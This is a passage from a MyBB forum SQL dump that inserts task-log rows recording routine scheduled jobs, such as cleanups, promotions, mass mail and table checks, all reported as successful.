`data`) VALUES ('12944', '7', '1351265139', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12945', '9', '1351265227', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12946', '5', '1351265260', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12947', '3', '1351265415', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12948', '9', '1351266824', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12949', '5', '1351266875', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12950', '9', '1351266980', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12951', '3', '1351267244', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12952', '1', '1351267255', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12953', '7', '1351267400', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12954', '5', '1351269577', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12955', '9', '1351269643', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12956', '3', '1351269694', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12957', '5', '1351270073', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12958', '9', '1351271348', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12959', '3', '1351271380', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12960', '1', '1351271978', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12961', '7', '1351271985', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12962', '5', '1351272023', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12963', '9', '1351272040', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12964', '5', '1351273661', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12965', '9', '1351273685', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12966', '3', '1351273719', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12967', '9', '1351275183', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12968', '3', '1351275214', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12969', '1', '1351275250', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12970', '7', '1351275274', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12971', '5', '1351275704', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12972', '5', '1351276114', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12973', '9', '1351276122', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12974', '3', '1351276359', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12975', '9', '1351278934', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12976', '5', '1351278936', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12977', '3', '1351278942', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12978', '1', '1351278953', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12979', '7', '1351278955', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12980', '5', '1351280084', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12981', '9', '1351280119', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12982', '3', '1351280144', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12983', '9', '1351280817', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12984', '5', '1351280850', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12985', '9', '1351281872', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12986', '3', '1351281878', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12987', '1', '1351281975', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12988', '7', '1351281983', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12989', '5', '1351282032', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12990', '9', '1351282343', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12991', '5', '1351284567', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12992', '9', '1351284648', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12993', '3', '1351285410', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12994', '9', '1351286284', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12995', '1', '1351286536', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12996', '7', '1351286541', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12997', '5', '1351286552', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12998', '5', '1351286956', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('12999', '9', '1351287016', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13000', '3', '1351287027', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13001', '9', '1351288587', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13002', '5', '1351288591', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13003', '3', '1351292714', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13004', '1', '1351292739', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13005', '7', '1351292751', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13006', '5', '1351292770', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13007', '9', '1351293352', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13008', '5', '1351294126', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13009', '9', '1351294206', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13010', '3', '1351294251', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13011', '9', '1351299628', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13012', '5', '1351302744', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13013', '3', '1351302761', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13014', '1', '1351302766', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13015', '2', '1351303286', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13016', '7', '1351303296', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13017', '11', '1351303298', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13018', '9', '1351303423', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13019', '3', '1351303454', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13020', '1', '1351303470', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13021', '5', '1351303524', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13022', '9', '1351303961', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13023', '5', '1351305133', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13024', '9', '1351305155', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13025', '3', '1351305198', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13026', '9', '1351305619', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13027', '5', '1351305910', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13028', '9', '1351306526', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13029', '3', '1351306869', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13030', '1', '1351306894', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13031', '7', '1351306988', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13032', '5', '1351307165', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13033', '9', '1351307491', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13034', '5', '1351308386', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13035', '9', '1351308439', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13036', '3', '1351308786', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13037', '9', '1351309235', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13038', '5', '1351310795', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13039', '9', '1351310821', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13040', '3', '1351310843', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13041', '1', '1351310848', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13042', '7', '1351310853', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13043', '9', '1351313165', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13044', '5', '1351313172', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13045', '3', '1351313224', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13046', '9', '1351314363', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13047', '3', '1351314372', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13048', '1', '1351314385', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13049', '7', '1351314536', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13050', '5', '1351314544', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13051', '9', '1351314832', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13052', '5', '1351316058', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13053', '9', '1351316094', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13054', '3', '1351316101', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13055', '9', '1351316728', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13056', '5', '1351316763', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13057', '9', '1351317405', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13058', '3', '1351317901', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13059', '1', '1351318026', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13060', '7', '1351318086', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13061', '5', '1351318725', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13062', '9', '1351319822', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13063', '5', '1351319910', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13064', '3', '1351320002', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13065', '9', '1351320059', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13066', '5', '1351320504', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13067', '9', '1351321012', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13068', '3', '1351321357', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13069', '1', '1351321359', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13070', '7', '1351321361', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13071', '5', '1351321506', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13072', '9', '1351322681', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13073', '5', '1351322739', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13074', '9', '1351324882', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13075', '3', '1351324923', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13076', '5', '1351325062', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13077', '1', '1351325502', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13078', '7', '1351325506', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13079', '5', '1351325990', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13080', '9', '1351326299', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13081', '5', '1351327776', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13082', '9', '1351327881', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13083', '3', '1351329104', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13084', '9', '1351329121', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13085', '1', '1351329441', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13086', '7', '1351329511', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13087', '5', '1351329514', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13088', '5', '1351330219', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13089', '9', '1351330238', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13090', '3', '1351330262', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13091', '9', '1351334346', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13092', '5', '1351334439', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13093', '3', '1351334538', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13094', '1', '1351334547', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13095', '7', '1351334578', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13096', '9', '1351334595', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13097', '5', '1351334742', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13098', '9', '1351335313', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13099', '3', '1351335980', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13100', '1', '1351335998', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13101', '7', '1351336006', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13102', '5', '1351336178', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13103', '9', '1351336591', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13104', '5', '1351337107', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13105', '9', '1351337683', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13106', '3', '1351337705', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13107', '9', '1351340248', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13108', '5', '1351340395', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13109', '3', '1351340417', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13110', '1', '1351340420', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13111', '7', '1351340446', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13112', '4', '1351340439', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13113', '5', '1351340709', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13114', '9', '1351340735', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13115', '3', '1351341013', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13116', '9', '1351341937', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13117', '5', '1351341949', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13118', '9', '1351342535', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13119', '3', '1351342748', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13120', '1', '1351342805', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13121', '7', '1351342852', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13122', '5', '1351343115', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13123', '9', '1351343813', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13124', '5', '1351345768', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13125', '9', '1351345797', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13126', '3', '1351345862', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13127', '9', '1351346697', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13128', '3', '1351348757', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13129', '1', '1351348849', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13130', '7', '1351348946', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13131', '5', '1351349091', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13132', '9', '1351349681', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13133', '5', '1351349721', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13134', '9', '1351352433', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13135', '3', '1351352491', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13136', '1', '1351352502', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13137', '7', '1351352503', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13138', '5', '1351352505', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13139', '5', '1351353133', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13140', '9', '1351353599', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13141', '3', '1351353867', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13142', '1', '1351354299', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13143', '7', '1351354466', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13144', '5', '1351354577', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13145', '9', '1351355685', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13146', '5', '1351355737', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13147', '3', '1351355751', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13148', '9', '1351356032', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, 